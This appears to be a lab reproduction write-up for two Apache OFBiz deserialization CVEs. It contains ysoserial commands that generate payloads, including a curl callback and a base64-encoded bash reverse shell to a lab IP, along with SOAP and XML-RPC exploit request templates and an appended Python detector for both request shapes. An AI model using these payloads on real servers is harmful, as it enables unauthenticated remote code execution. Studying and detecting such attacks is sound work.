
Reproducing two Apache OFBiz deserialization vulnerabilities (CVE-2021-26295 and CVE-2020-9496)

0x00 Overview

OFBiz is a Java-based web framework that includes an entity engine, a service engine and a widget-based UI. It is an e-commerce platform used to build multi-tier, distributed e-commerce applications for medium and large enterprises that are cross-platform, cross-database and cross-application-server.

CVE-2021-26295: RMI deserialization leading to command execution; an unauthenticated attacker can fully take over Apache OFBiz.

CVE-2020-9496: unauthenticated deserialization through the xmlrpc endpoint leading to RCE.

 

0x01 Affected versions

CVE-2021-26295:Apache OFBiz < 17.12.06

CVE-2020-9496:Apache OFBiz < 17.12.04

 

0x02 Reproduction

app="Apache_OFBiz"

CVE-2021-26295

docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz

 

POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
    <map-HashMap>
        <map-Entry>
            <map-Key>
                <cus-obj>ace......e78</cus-obj>
            </map-Key>
            <map-Value>
                <std-String value="http://xxxxxx.dnslog.cn"/>
            </map-Value>
        </map-Entry>
    </map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>

The cus-obj value in the middle is produced directly with:

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out

Then convert it to hex:

import binascii

# Read the ysoserial output written above and print it as a hex string,
# which is what goes inside <cus-obj>. .decode() drops the b'...' wrapper
# that print() would otherwise show for a bytes object.
filename = 'ofbizhex.out'
with open(filename, 'rb') as f:
    content = f.read()
print(binascii.hexlify(content).decode('ascii'))

 

RCE

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME 'curl http://192.168.56.200:7766/testofbizrce' > b2h10.txt

 

POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
  <soapenv:Header/>  
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key> <cus-obj>aced00057......00678</cus-obj>
          </map-Key>  
          <map-Value>  
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>

 

 

Reverse shell

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME 'bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}' > b2h11.txt

 

POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
  <soapenv:Header/>  
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key> <cus-obj>aced00057......000678</cus-obj>
          </map-Key>  
          <map-Value>  
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>

 

CVE-2020-9496

Environment: https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/

https://192.168.56.200:8443/myportal/control/main

https://192.168.56.200:8443/webtools/control/xmlrpc

 

java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"

 

POST /webtools/control/xmlrpc HTTP/1.1
......
Content-Type: application/xml
 
<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0......A14</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
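As an added example (not from the original post, and not OFBiz code), a small Python check over a request body that flags both request shapes shown in this post: a SOAPService `cus-obj` whose hex decodes to a Java serialization stream (`aced0005` header), and an xmlrpc `<serializable>` extension element whose base64 decodes to the same header. The function name and the sample bodies are my own; the blobs in the samples are short constructed stand-ins, not real gadget chains.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 5.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"
XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"

def _decode_hex(text):
    try:
        return binascii.unhexlify("".join(text.split()))
    except (binascii.Error, ValueError):
        return b""

def _decode_b64(text):
    try:
        return base64.b64decode("".join(text.split()), validate=True)
    except (binascii.Error, ValueError):
        return b""

def detect_ofbiz_deserialization(body):
    """Return one finding per embedded Java object in an XML request body; [] when clean."""
    findings = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return findings  # not XML: nothing for this particular check to flag
    for el in root.iter():
        ns, _, local = el.tag.rpartition("}")  # ElementTree tags look like '{ns}local'
        ns = ns.lstrip("{")
        text = el.text or ""
        if local == "cus-obj" and _decode_hex(text).startswith(JAVA_SER_MAGIC):
            findings.append("SOAPService cus-obj carries a hex Java object (CVE-2021-26295 pattern)")
        elif (local == "serializable" and ns == XMLRPC_EXT_NS
              and _decode_b64(text).startswith(JAVA_SER_MAGIC)):
            findings.append("xmlrpc serializable carries a base64 Java object (CVE-2020-9496 pattern)")
    return findings

# Constructed sample bodies: the blobs are short stand-ins, not real gadget chains.
SOAP_SAMPLE = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body><ser><map-HashMap><map-Entry>
<map-Key><cus-obj>aced00057372</cus-obj></map-Key>
<map-Value><std-String value="http://example.invalid"/></map-Value>
</map-Entry></map-HashMap></ser></soapenv:Body></soapenv:Envelope>"""
XMLRPC_SAMPLE = """<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>
<params><param><value><struct><member><name>test</name><value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNy</serializable>
</value></member></struct></value></param></params></methodCall>"""
CLEAN_SAMPLE = "<methodCall><methodName>ProjectDiscovery</methodName><params/></methodCall>"
```

Decoding before matching, rather than grepping for the literal strings `aced0005` or `rO0AB`, keeps whitespace-split or re-encoded blobs from slipping past the check.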

 

 
